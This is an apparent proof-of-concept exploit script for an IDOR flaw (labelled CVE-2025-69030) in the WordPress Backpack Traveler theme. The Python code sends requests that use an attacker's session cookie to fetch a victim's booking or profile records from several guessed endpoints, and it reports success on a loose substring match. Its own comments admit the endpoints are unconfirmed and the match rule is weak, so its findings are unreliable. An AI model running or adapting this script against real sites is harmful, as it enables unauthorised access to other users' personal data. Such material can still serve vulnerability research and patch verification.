# CVE-2025-69030 PoC - Backpack Traveler IDOR Vulnerability
# Author: Security Researcher
# Target: WordPress Backpack Traveler Theme <= 2.10.3
import requests
import argparse
from urllib.parse import urljoin
def exploit_idor(target_url, attacker_cookie, victim_resource_id):
    """Probe candidate endpoints for an object-reference authorization gap.

    Sends requests that carry ``attacker_cookie`` but name
    ``victim_resource_id``, and stops at the first response that matches a
    loose success heuristic.

    Args:
        target_url: Base URL of the site; every candidate path is resolved
            against it with ``urljoin``.
        attacker_cookie: Raw ``Cookie`` header value sent with every request.
        victim_resource_id: Identifier placed in the form fields, or appended
            to the URL for the field set that has no ``action`` key.

    Returns:
        True on the first response with status 200 whose body contains the
        substring "user" (case-insensitive); False when no response matches.

    Notes for triage:
        * The paths and action names are candidates only ("may be
          vulnerable"); nothing in this script confirms that any of them is
          the affected handler.
        * The match rule is a substring check, so a True result is a lead to
          verify by hand, not evidence that another account's data was
          returned.
        * NOTE(review): ``/wp-json/wp/v2/`` is the WordPress core REST
          namespace rather than a theme route, so a hit there would not by
          itself implicate the theme -- confirm before reporting.
    """
    candidate_paths = (
        "/wp-admin/admin-ajax.php",
        "/wp-json/wp/v2/users/",
        "/wp-json/backpack/v1/",
    )

    # Every request carries these headers; together with the action names
    # below they are the fields a log search for this script's traffic
    # would key on.
    request_headers = {
        "Cookie": attacker_cookie,
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
    }

    print(f"[*] Testing IDOR on {target_url}")
    print(f"[*] Target resource ID: {victim_resource_id}")

    # Field sets tried against every path, in this order.
    probes = (
        {"action": "get_booking_details", "booking_id": victim_resource_id},
        {"action": "get_user_profile", "user_id": victim_resource_id},
        {"id": victim_resource_id},
    )

    for path in candidate_paths:
        full_url = urljoin(target_url, path)
        for fields in probes:
            try:
                if "action" not in fields:
                    # No action key: the id is appended to the URL and the
                    # request is sent as a GET.
                    response = requests.get(
                        full_url + str(victim_resource_id),
                        headers=request_headers,
                        timeout=10,
                    )
                else:
                    response = requests.post(
                        full_url,
                        data=fields,
                        headers=request_headers,
                        timeout=10,
                    )

                # Guard clauses keep the original short-circuit: the body is
                # only read once the status is 200.
                if response.status_code != 200:
                    continue
                if "user" not in response.text.lower():
                    continue

                print(f"[+] Potential IDOR found at {full_url}")
                print(f"[+] Response snippet: {response.text[:200]}")
                return True
            except requests.RequestException as e:
                # Transport errors are reported and the next probe is tried.
                print(f"[-] Request failed: {e}")

    return False
if __name__ == "__main__":
    # Command-line entry point: all three options are mandatory and are
    # passed straight through to exploit_idor(); its boolean result is not
    # used, so the process exit status does not reflect the outcome.
    cli = argparse.ArgumentParser(description="CVE-2025-69030 PoC")
    for short_flag, long_flag, help_text in (
        ("-u", "--url", "Target WordPress URL"),
        ("-c", "--cookie", "Attacker session cookie"),
        ("-r", "--resource", "Victim resource ID"),
    ):
        cli.add_argument(short_flag, long_flag, required=True, help=help_text)

    opts = cli.parse_args()
    exploit_idor(opts.url, opts.cookie, opts.resource)
# Usage: python cve-2025-69030.py -u http://target.com -c "wordpress_logged_in=xxx" -r 1